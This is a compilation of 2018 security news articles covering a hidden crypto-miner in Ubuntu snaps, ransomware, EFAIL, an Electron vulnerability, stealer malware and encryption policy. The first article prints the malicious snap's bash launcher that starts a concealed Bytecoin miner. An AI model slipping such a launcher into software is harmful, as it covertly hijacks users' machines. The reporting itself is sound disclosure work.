STE WILLIAMS

Admins of the Ubuntu Store have pulled all apps from a developer who signed himself “Nicholas Tomb”, and from his e-mail signature apparently wanted to crypto-mine himself into a Ferrari.

Mr Tomb’s “2048buntu” and “Hextris applications are now absent from the store, with their removal sparked by a GitHub comment about the 2048buntu. User Tarwirdur wrote “This application contains hidden сrypto-currency miner inside” (it was mining Bytecoin) and asked how this could be reported.

Here’s the code Tarwirdur spotted (look for the e-mail sig in the seventh line):

squashfs-root/systemd - miner
squashfs-root/start - init script:
#!/bin/bash

currency=bcn
name=2048buntu

{ # try
/snap/$name/current/systemd -u [email protected] --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores  4 )); then
    /snap/$name/current/systemd -u [email protected] --$currency 1
else
    /snap/$name/current/systemd -u [email protected] --$currency 2
fi
}

Canonical’s Adam Collard responded “yes, we’ve removed all applications from this author pending further investigations. Thank you for your vigilance!”

The apps were created using Ubuntu’s “Snaps” tool, which packages code so that all their dependencies ride along, and install with an auto-updater. Canonical created Snaps to try and simplify package deployment on Linux distributions.

Apps with ride-along miners are hard to spot: even the likes of Google and Apple, which both have cash and people galore, miss malicious apps from time to time. The far-smaller Canonical has the advantage of open sourcery providing an army of crook-code-detectors. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/14/ubuntu_crypto_mining_apps/

The Australian State of New South Wales’ reproductive and sexual health organisation Family Planning NSW has advised users of an April 2018 ransomware attack that may have compromised sensitive information.

The agency apparently retained web form messages on the public-facing server, meaning if its database was breached, attackers would have access to individuals’ messages to Family Planning.

The organisation said it’s contacting up to 8,000 clients to advise them of the April 26 event, and at the time of writing, its Website carried the message “Our website is getting a security update”.

The agency says it was one of several “targeted by these cyber criminals requesting a Bitcoin ransom on ANZAC Day^* [April 25th]”. The organisation’s message says the site was “secured by 10am on April 26”, and “more sensitive medical records held internally were never under threat”.

Family Planning NSW says it has contacted the Australian Federal Police about the attack.

As writer Lauren Ingram pointed out on Twitter, even the contents of a contact form can contain sensitive information: “People contact Family Planning NSW for everything from contraception and advice on unplanned pregnancy/abortion, to cervical cancer screenings, STI tests, vasectomies and men’s sexual heath”, she noted.

Family Planning told The Register while there was a demand for ransom, “According to a security analysis by our webhost, they did not attempt to encrypt data let alone succeed.”

The attackers put a message on the site threatening to shut it down unless they were paid AU$15,000 in Bitcoin, CEO Ann Brassil told a press conference today.

The sensitivity of the information brings any potential breach under Australia’s Notifiable Data Breaches Scheme, which launched in February 2018 (it’s administered by the Office of the Australian Information Commissioner – there’s an explainer here). ®

^* Australian and New Zealand’s equivalent of the UK’s Remembrance Day and the USA’s Memorial Day.

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/14/family_planning_nsw_warns_people_of_possible_site_breach/

A professor of Computer Security at the Münster University of Applied Sciences‏ has warned that popular email encryption tool Pretty Good Privacy (PGP) might actually allow Pretty Grievous P0wnage thanks to bugs that can allow supposedly encrypted emails to be read as plaintext.

Professor Sebastian Schinzel took to Twitter with the news early on Monday, European time.

We’ll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4

— Sebastian Schinzel (@seecurity) May 14, 2018

A second Tweet warns “There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.”

Schnizel and his fellow researchers have alerted a few folks about the problem, among them the Electronic Frontier Foundation which has assessed his research and agreed that PGP has flaws.

An EFF advisory says “these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.”

“Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email,” the EFF’s post said. It also name dEnigmail for Thunderbird, GPGTools for Apple Mail and Gpg4win for Outlook as worthy of disablement, and offers instructions on how to do so.

“Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email,” the advisory says.

Schnizel has promised full details on Tuesday morning at 0700 UTC. Reg operatives somewhere will be paying attention when he reveals all. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/14/pgp_s_mime_flaws_allow_plaintext_email_access/

In this episode of the Chet Chat podcast, Sophos experts Chester Wisniewski and Greg Iddon discuss the latest Drupal attacks, patch urgency, the IC3 report on cybercrime and the cost of cryptomining.

If you enjoy the podcast, please share it with other people interested in security and privacy and give us a vote on iTunes and other podcasting directories.

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/UmjKg-XncA4/

Electron developers need to check their apps, after a security researcher turned up a remote code execution bug in the framework.

What TrustWave’s Brendan Scarvell found is that an attacker can turn on services beyond the developer’s intent.

A developer only needed to be a little careless, accepting defaults without explicitly turning a service off, and their application would be vulnerable.

The post noted that the framework is used by “Slack, Discord, Signal, Atom, Visual Studio Code, and Github Desktop”, among others.

Scarvell explained the conditions for an app to be vulnerable: it’s built on version 1.7.13, 1.8.4, or 2.0.0-beta.3, and the developer hasn’t manually set one of the following:

• ”Declared webviewTag: false in its webPreferences;
• ”Enabled the nativeWindowOption option in its webPreferences; or
• ”Intercepting new-window events and overriding event.newGuest without using the supplied options tag.”

So, what’s going on here? Setting nodeIntegration: false in an app’s webPreferences is supposed to prevent interaction with the Electron API from gaining access to the underlying Node.js – and that’s switched off by default.

The nodeIntegration: false setting also saves the developer the effort of sanitising user inputs which, if they were handled by Node.js, would enable XSS attacks.

The one bug to bring them all down – CVE-2018-1000136 (including, but not limited to: Signal Desktop, Slack, Discord, Atom, Visual Studio Code, Github Desktop) https://t.co/dPDkecJzFm #electron #vulnerability

— x0rz (@x0rz) May 12, 2018

As Scarvell explained, the vulnerability he found allowed an attacker to change the nodeIntegration setting to “true”.

The issue is in the handling of another tag, WebView, which allows a developer to “embed content, such as web pages, into your Electron application and run it as a separate process”, in combination with how Electron handles new browser windows.

An attacker, he wrote, could control the new browser window (the window.open command) to pass a WebView tag that enabled nodeIntegration (that is, set it to “true”).

Electron has provided a patch to CVE-2018-1000136 in versions 1.7.13, 1.8.4, 2.0.0-beta.4 here, along with mitigation instructions if, for some reason, a developer can’t upgrade. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/14/electron_xss_vulnerability_cve_2018_1000136/

Roundup This week saw hackers exploit train wi-fi connections, while IBM cut off worker thumb(drive)s, and world+dog missed a major security hole in Intel’s CPUs.

With yet another week done, let’s take a look at some of the more noteworthy security bits that also happened.

7Zip gets 7Ripped

Researchers have poked a hole in the 7-Zip archiving tool, and you’ll want to update the software as soon as possible.

The bug, discovered by researcher landave, allows remote code execution by way of poisoned RAR files, though the RAR payload can also be disguised as other archive formats.

Because the flaw can be exploited fairly easily on fully patched Windows 10 machines, you will want to update to 7-Zip version 18.05 or later.

Rowhammer swings again with network-based attacks

It has been three years since the infamous ‘Rowhammer‘ technique was first disclosed, and the menace of the bit-slamming memory attack is still being exploited in new and devious ways.

This time it is network connections that have been found vulnerable to brute-force memory corruption trick. Researchers from Vrije Universiteit in Amsterdam found [PDF] that network packets can be used to trigger the address error conditions on any machine that has remote direct memory access (RDMA) enabled.

This means that, for the first time, Rowhammer has been shown to be remotely exploitable and an attacker no longer requires local access to a machine in order to take advantage of the vulnerability.

What’s worse, RDMA is a favorite technique for low-latency network setups, meaning the vulnerable systems are high-value targets like cloud providers and data centers.

iOS 11.4 leaves USB port USBricked when inactive

Apple has added a new security measure to the next version of iOS that will make it harder to get around the unlock screen of a handset, particularly one that hasn’t been used for some time.

Elcomsoft explains that under iOS 11.4 (now in beta) the lightning/USB port on the iPhone will become partially locked down during long idle periods.

Specifically, when the iPhone hasn’t been unlocked in seven days, the port will go into-power only mode and will not make any data transmissions until it is unlocked again via key code. This means people who seize a phone (via legal or other means) will not be able to use the USB connection to get around locks unless they do so immediately.

It remains to be seen what this could mean for law enforcement tools like GrayKey that are used to get around iPhone lock screens via Lightning.

Georgia comes to its senses, kills stupid ‘hacking’ bill

The infamous Georgia state legislation that would have criminalized many forms of white hat hacking has been put on ice.

Governor Nathan Deal on Tuesday vetoed SB315 amidst pressure from the software and IT industries in the state. The bill would have tightened restrictions on unauthorized access, including criminalizing cases where someone got into a system but did not steal any data.

Many security professionals had opposed the bill arguing that it would have a chilling effect on network security testing and bug-hunting practices.

‘Electrum Pro’ caught lifting coins

Cryptocoin investors will want to make sure they’re not running the malicious ‘ElectrumPro’ wallet, which researchers believe is stealing coins from users.

As BlockExplorer explains, the wallet app is apparently a malware in disguise, as it is has been caught lifting the seed code of users. This, potentially, would allow the controller of the malware’s domain to get into user wallets.

The site recommends that anyone who has been using the infected wallet should immediately find and move their cryptocoins to a new, secure wallet, as anyone who had access to the ElectrumPro domain would now potentially be able to remote access and steal user coins.

Bolton considering eliminating top cybersec job

Sentient mustache John Bolton is reportedly looking to eliminate one of Washington DC’s top infosec jobs.

A report citing sources familiar with the matter says that the White House cybersecurity coordinator position will soon be no more. Security guru Rob Joyce currently holds the position, but is set to step down.

When that happens, Bolton is reportedly planning to leave the position unfilled, effectively doing away with the job altogether and handing over many of its responsibilities to Mira Ricardel, Bolton’s deputy National Security Advisor.

As with many of the Trump administration’s hatchet jobs, the cybersecurity coordinator position was a creation of the Obama regime.

Government cybersecurity experts are, not surprisingly, said to be less than enthused about this move as it suggests the NSA is putting less of a focus on cybersecurity – or at least employing one less cybersecurity experts in its ranks.

State department hacking bill approved

Elsewhere in Washington, DC, the House of Representatives has advanced a bill to invite security researchers into the State Department’s folds.

The excellently named Hack Your State Department Act was approved by the Foreign Affairs committee, meaning the bill is one step closer a full vote.

The act would establish a research and bug bounty program for white hats who wish to seek out security vulnerabilities in US State Department websites.

The bill is being championed by the bi-coastal, bi-partisan duo of the Teds Lieu (D-CA) and Yoho (R-FL).

Bad Panda makes you a sad panda

F5 Labs has uncovered a new banking malware strain that uses a cute name to hide a scary attack.

Dubbed ‘Panda’, the account-stealing malware is actually a variant on the infamous Zeus trojan that targets banks and cryptocurrency exchanges. In addition to web injects (adding content to otherwise legitimate pages), the malware is able to capture screenshots and log keystrokes. It also has a remote access component that could allow the attacker to break into your machine and get anything they couldn’t lift via the surveillance components.

F5 recommends keeping all anti-malware software up to date in order to prevent infection.

Google Play hit with more malware woes

No, this is not a repeat. More malware nasties have been found lurking in the Google Play store. This time, researchers at Symantec say, it is educational apps and games that are being used as the trojans for the Android infections.

Researchers May Ying Tee and Martin Zhang found more than three dozen examples of such apps having snuck through the Play Store’s screening process, serving Android users additional downloads of Adware and click fraud apps that covertly load up other web pages and blogs in order to inflate affiliate traffic.

Wild pwnberries blossom on Chrome

Elsewhere in Google malware woes, we have a Chrome plug-in attack based on a children’s cartoon. How quaint.

Researchers with Radware say the malicious plugin, dubbed ‘Nigelthorn’, also hijacks infected machines to mine cryptocurrency. Disguising itself as ‘Nigelify’, a Chrome plug-in that turns images on a web page into cartoon character Nigel Thornberry of ‘Wild Thornberrys’ fame, the malware is being spread through Facebook spam and phony YouTube pages.

Both Windows and Linux versions of Chrome are vulnerable to the nasty add-on.

Tor pedo ‘glad to be caught’

The fallout from the FBI’s Playpen operation with another pervert being jailed for using the child abuse site, but this one says he’s happy to be sent down.

Irishman Conor Emmet, 20, was jailed for 156 months on Friday after the FBI passed his IP address to Dublin police. He was found with 5,919 images and 328 video files of child abuse, including one video involving an 18-month old child. Police used that video to identify and rescue the child in Thailand.

Emmet admitted his crimes, saying he was glad the police caught him, and has already begun a treatment program. For that reason the judge only gave him half the maximum sentence and suspended a portion of it. Nevertheless one more child-abuse enabler is off the streets.

In brief

The source code to sales-terminal-infecting malware TreasureHunt has leaked, according to FlashPoint, meaning that miscreants can get their hands on blueprints to credit-card-stealing spyware. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/12/security_roundup/

Researchers find campaigns distributing Gandcrab by hosting malware on legitimate websites with poor security measures.

Cryptominers may have stolen the spotlight as cybercrime’s hottest new trend, but it doesn’t mean we can stop paying attention to ransomware. Researchers at Cisco Talos detected a new batch of Gandcrab ransomware being distributed through legitimate but poorly secured sites.

Gandcrab, among the newest threats in the ransomware space, started as a simple attack and quickly evolved as its authors adapted to security defenses. In the first two months of 2018, attackers infected more than 50,000 victims and generated more than $600,000 for attackers. This threat spreads via spam campaigns and exploit kits including Rig and Grandsoft.

Talos researchers were analyzing a recent spam campaign when they found a series of compromised sites delivering Gandcrab and continued to identify four separate campaigns over the period of one week. The first started on April 30 and was disguised as an online order. An attached ZIP file has a Word document that downloads and executes the ransomware. Emails contained either VBScripts or ZIP files but always delivered the same result.

An interesting part of this campaign is the tools used to download Gandcrab. There are several ways to do this with macros, but attackers chose to use certutil.exe, a command line utility installed as part of Certificate Services. The use of certutil demonstrates how adversaries are seeking new and effective ways to download malware onto targets’ machines, says Talos threat researcher Nick Biasini.

A couple of days later, the second campaign arrived. Its subject, bodies, and attachments were very similar to those in the first; however, the location of where the payload was hosted had changed. Researchers looked at the DNS and noticed it was delivered from a legitimate site, which was running phpMyAdmin and had multiple MySQL flaws and default credentials. The website was taken down shortly after this was discovered, researchers say in a blog post.

The third campaign was found downloading Gandcrab from an out-of-date WordPress site riddled with vulnerabilities. The fourth leveraged the same website, highlighting another trend. Sometimes attackers return to the same site, even after it has been taken down. This pattern shows attackers aren’t putting much effort into making their campaigns unique.

Biasini says this distribution of Gandcrab highlights a major problem for businesses: website compromise. Many of the Web pages on the Internet are running on antiquated software and most small businesses don’t know a new flaw has been released. Even if they did, they don’t have the expertise or time to update the software they rely on.

“It is increasingly easy to create a website based on a lot of the Web frameworks like WordPress, Joomla, and Drupal, among others,” he explains. “The challenge is that most people creating and hosting a small-business website aren’t aware that the software needs to be updated and secondly may not have the knowledge or time to undertake such an endeavor.”

Each of these platforms has some form of remote management, Biasini continues. Average employees don’t realize this portal needs to have strong credentials and, ideally, have the administrative page restricted to the specific IP address space. “These exposed admin pages with weak credentials are easily compromised by far more sophisticated adversaries,” he notes.

Attackers will continue to leverage compromised websites because they save time and money related to domain registration, buying VPS, and configuring the server to host files. They also inherit the site’s reputation, which can help with slipping past blacklisting systems.

This specific version of Gandcrab is generating a discussion around how often the malware is updated, and its creators’ active participation in developing new iterations of it. “They are continually making changes and updates to this ransomware,” says Biasini.

Businesses can protect themselves by patching their software, including any and all plug-ins that could be used on the site. Beyond that, he recommends securing admin portals on the pages and implementing strong passwords. In a brute-force attack, weak passwords could lead to compromise and grant the attacker access until the authentication is updated.

Related Content:

• Hide and Seek Brings Persistence to IoT Botnets
• 8 Ways Hackers Can Game Air Gap Protections
• Author of TreasureHunter PoS Malware Releases Its Source Code
• Phishing Attack Bypasses Two-Factor Authentication

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/endpoint/gandcrab-ransomware-exploits-website-vulnerabilities/d/d-id/1331787?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Marketing, PR, and advertising firms are among those being targeted.

A low-volume data-stealing campaign with the potential to get much bigger has begun targeting retail and manufacturing companies and also a select list of marketing, advertising, and public relations firms.

Email security vendor Proofpoint says it has observed and blocked new malware called Vega Stealer that is being used in the campaign to steal saved credentials, credit card data, and profile information in the Chrome and Firefox browsers. The malware is also being used to steal other sensitive data from infected computers.

Vega appears to be a somewhat stripped-down variant of August Stealer, a malware that a threat actor dubbed TA530 used in a highly personalized data-stealing campaign in 2016 aimed at managerial and customer service staff at retail companies.

As with the August Stealer campaign, the new campaign involving Vega Stealer is notable for how targeted it is. Proofpoint says it has observed emails with subjects like “Online store developer required” being sent to what it described as a “narrow set” of companies in the targeted industries.

The emails have contained a rogue attachment called “brief.doc” containing macros that download Vega Stealer. In addition to individuals, the threat actor has been sending emails with the malicious attachment to distribution lists such as “[email protected]” and “[email protected]” in an apparent bid to multiply the number of potential victims at the targeted domains.

Kevin Epstein, vice president of threat research at Proofpoint, says the motivations behind the threat actor’s targeting are presently unclear. “At this time, we cannot speculate on potential motivations,” he says. Campaigns of this size are often either a test or a targeted effort. What organizations need to keep in mind is that Vega Stealer is capable of stealing a wide variety of data stored by Web browsers and on infected systems.

Vega Stealer in its present form is not particularly sophisticated and does not employ any packing or obfuscation methods to evade detection. The malware is designed to steal passwords, cookies, profile data, and saved credit card information from browsers. It can also search an infected computer’s desktop and subdirectories for Word documents, spreadsheets, and PDF files. The malware communicates with a hard-coded remote command and control (CC) server to which it also sends any stolen data.

What makes Vega Stealer somewhat problematic is its lineage, according to Proofpoint. Vega Stealer appears to be a modification of the considerably more widely distributed August Stealer and is being distributed by a threat actor linked to Ursnif, a somewhat notorious banking Trojan.

“August Stealer has become a fairly common threat, and Vega is a descendent of this malware,” Epstein says. “It also appears that the actor distributing Vega regularly distributes the Ursnif banking Trojan, which often downloads secondary payloads such as Nymaim, Gootkit, or IcedID,” he says. All of these are well-established malware families that continue to be under active development.

Organizations in targeted sectors need to keep an eye out for Vega Stealer. Though the malware is not especially sophisticated in its current form, it has the potential to become a bigger threat in future. “Although Vega does not appear to be as robust yet as August Stealer, the potential for information and credential theft for unprotected organizations is high, especially if we begin to see more widespread distribution,” Epstein says.

“Email gateway protection, network protection to detect CC communication and data exfiltration, and endpoint protection all contribute to keeping organizations safe” from threats like these he says.

Related Content:

• New Email Campaign Employs Malicious URLs
• Emailed Cyberattack Targets 2018 Pyeongchang Olympics
• Hackers Steal Payment Card Data on 880K from Expedia Orbitz
• 8 Ways Hackers Monetize Stolen Data

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/proofpoint-sounds-warning-on-vega-stealer-targeted-data-theft-campaign/d/d-id/1331789?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A job worth doing is worth doing well.

And when a job is worth doing well, it’s often worth going all-in.

A good example is how to quit smoking: you can try cutting down a bit in the hope of tapering off; you can try smoking milder cigarettes; you can try replacing your addiction to the nicotine in cigarettes with an addiction to the nicotine in something else; you can even carry on smoking but tell everyone, including yourself, that you didn’t inhale.

But quitting doesn’t admit of half measures, and the best and quickest way to do it is simply never to smoke again, from this day forward, for evermore.

Job done. (As in, “Easier said than.”)

By all accounts, IBM has decided to do just that – go cold turkey, that is – in dealing with the problem of lost data on removable storage devices.

Simply put: NO MORE USB DRIVES.

Instead of trying to manage the problem of who copied what to which USB stick from what computer using which type of encryption, word on the street is that IBM’s Chief Information Security Officer (CISO), Shamla Naidoo, has taken a much blunter approach, along the lines of, “If you want to move files around, use the network.”

It’s a bold approach, and in the modern cloud era, it’s not as outrageous as it might at first sound.

Many users are perfectly used to backing data up into the cloud, and even to having files such as photos automatically uploaded from one device and seamlessly synched with another.

But can an outright ban on something as widely used, and as useful, as USB sticks really work?

We asked our very own CISO, Ross McKerchar, what he thought:

Removable storage is a massive concern. While it’s a less common (but still real!) malware infection vector now, the biggest risk these days is data leakage.

To take a quick trip down memory lane: seven years ago we bought a stash of USB keys from a lost property auction as an experiment. 66% of them had malware on, and not a single one was encrypted.

With Europe’s GDPR kicking in at the end of this month, threatening much bigger fines for companies that don’t take proper care of their data, the timing of IBM’s new rule is hardly a surprise.

After all, if you don’t have a USB drive in the first place, you can’t lose it, so that’s one less way for data to show up in the wrong places.

But, as Ross warns:

Outright bans of any useful technology breed “shadow IT” [where users just do their own IT thing anyway]. Humans are highly creative and often find workarounds that are more risky than the thing being banned. Where possible, organisations will be will be more effective making the easy way the safe way.

Enforcing USB encryption across a company the size of IBM is probably very tricky, but for a company of average size, it’s a good way to mitigate the risk whilst allowing people to work in a way they’re comfortable with.

Providing sanctioned cloud sharing services as well, combined with the right controls add training, helps further because it can avoid the need to copy data onto USB drives in the first place. One handy thing about sharing rather than copying content is that it’s much easier to audit and ‘unshare’ if a mistake is made.

What’s a USB drive, anyway

One tricky challenge with an outright ban on USB drives is that there are many different sorts of removable storage – notably including devices that present themselves with two faces.

For example, I have a portable audio recorder that I use for podcasting: you can plug in into a laptop and use it as a high-quality microphone, or you can use it as a handheld standalone device and download the files from it later on.

You can see where this is going: when you connect the device via a USB cable, a menu pops up on the device where you choose which way the device will work, and one of those options makes it behave as a USB drive.

Do you ban the device because it’s a part-time USB drive? Do you take the extra steps needed to teach your device control software that it’s two subdevices, and that the audio-flavoured one is OK but the disk-flavoured one is not?

If you make me an exception to the rule, because I’m special on account of doing podcasts, how do you deal with the fallout from that, when everyone else decides they’re special, too?

(All they have to do is say they need to record meetings, or that they’re also into podcasting, or that they’ve got a similar issue with a camera that they use for work purposes.)

If you block everyone else, forcing them to change, but let me off the hook so that I really am special, what then?

As Ross warns:

Insider threats are a concern for all organisations. The first defence is a vigilant management team – employees intent on doing something malicious are often disenfranchised and frustrated.

What to do?

We can see why IBM, an enormous IT company that is itself a giant cloud provider, might want to replace USB drives with ubiquitous network storage, and why such an approach might not only work well, but also be largely obeyed by staff.

But if you have a small business, with a few employees who are sometimes in the office, sometimes at home, and sometimes on the road…

….the convenience of USB drives for temporary backup, or to have around to tide you over internet outages, is probably a baby that you don’t want to throw out with the bathwater.

Worse still, even if you try to ban USB drives outright to save IT effort, you may very well find that you have created yet more IT effort to make sure you sometimes detect but sometimes allow all the “edge cases” such as audio recorders, cameras, and so on.

So, here are some tips that avoid the need for an outright ban on anything:

• Encrypt all your USB devices. It’s a bit more work than just having a free-for-all, but if you routinely encrypt everything, you never have to worry whether there were any files you forgot about.
• Provide easy-to-use alternatives. If you want to wean your staff off USB storage, give them a cloud-based solution that they’ll want to use, and that’s easy to learn.
• Make everyone aware of the risks. Banning USBs won’t stop data leakage – data copied to the cloud has “gone somewhere else” too, after all – so make sure your staff know why it’s important to care about security.
• Check your logs. Whether you use USBs, cloud drives or both, be sure to check any logs you keep of who’s put what where. If you aren’t going to look at your logs, don’t bother keeping them – never collect any data without a purpose.

To finish off with some board-level advice from Ross:

Visibility in computer security is vital. By having reporting tools for content sharing, CISOs can help senior management understand the risks and benefits of allowing sharing methods, whether they’re USB drives or cloud services.

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/cEyMI0ABAGg/

US lawmakers from both major political parties came together on Thursday to reintroduce a bill that, if passed, would prohibit the American government from forcing tech product makers to undermine the security of their wares.

The bill, known as the Secure Data Act of 2018, was returned to the US House of Representatives by Representative Zoe Lofgren (D-CA) and Thomas Massie (R-KY), with the support of Jerrold Nadler (D-NY), Ted Poe (R-TX), Ted Lieu (D-CA) and Matt Gaetz (R-FL), cosponsors of a past failed version of the bill from 2014 and a similarly ill-fated 2015 successor.

In the US Senate in 2014 and 2015, Sen. Ron Wyden (D-OR) sponsored parallel versions of the bill; a Senate equivalent has yet to be floated for this legislative term.

WHY can’t Silicon Valley create breakable non-breakable encryption, cry US politicians

READ MORE

The Secure Data Act forbids any government agency from demanding that “a manufacturer, developer, or seller of covered products design or alter the security functions in its product or service to allow the surveillance of any user of such product or service, or to allow the physical search of such product, by any agency.”

It also prohibits courts from issuing orders to compel access to data.

Covered products include computer hardware, software, or electronic devices made available to the public.

The bill makes an exception for telecom companies, which under the 1994 Communications Assistance for Law Enforcement Act (CALEA) would still have to help law enforcement agencies access their communication networks.

Though not specifically mentioned in the legislative text, this is a bill to protect the integrity of encryption systems.

After the FBI in 2015 faced delays accessing the iPhone used by mass shooter Syed Rizwan Farook, law enforcement officials became more vocal about concerns that encryption can leave investigators in the dark.

Though authorities fought and lost this battle in the early 1990s when they tried to mandate adoption of a backdoored chip, the Clipper Chip, they’ve not conceded. The argument also came up after the September 11 atrocity but was shot down on practical grounds.

But for the last few years the FBI has been pushing for backdoors again. Last month Ray Ozzie, designer of Lotus Notes and the former CTO of Microsoft, proposed a similar key escrow scheme, reviving hope among backdoor supporters that security and insecurity can safely coexist. Ozzie’s ideas have been panned by experts

In a speech on Monday, Attorney General Jeff Sessions said, it is “critical that we deal with the growing encryption or the ‘going dark’ problem.”

Thus backdoor skeptics have returned to do battle again.

“Encryption backdoors put the privacy and security of everyone using these compromised products at risk,” said Lofgren in a statement.

“It is troubling that law enforcement agencies appear to be more interested in compelling US companies to weaken their product security than using already available technological solutions to gain access to encrypted devices and services.”

Lofgren argues that encryption backdoors represent a demonstrated security risk and that they harm US companies and jobs by making American tech products less secure and thus less competitive on the global market. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/10/proposed_law_would_stop_feds_from_demanding_backdoors/